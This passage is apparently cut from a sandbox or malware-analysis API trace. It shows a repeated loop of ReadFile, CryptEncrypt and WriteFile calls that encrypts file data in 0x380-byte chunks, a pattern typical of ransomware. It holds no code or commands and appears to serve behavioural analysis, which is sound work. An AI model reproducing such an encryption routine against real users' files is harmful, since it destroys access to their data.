dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.521] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.521] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.521] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.521] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.522] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.523] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.524] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.526] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.527] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.528] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.529] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.529] 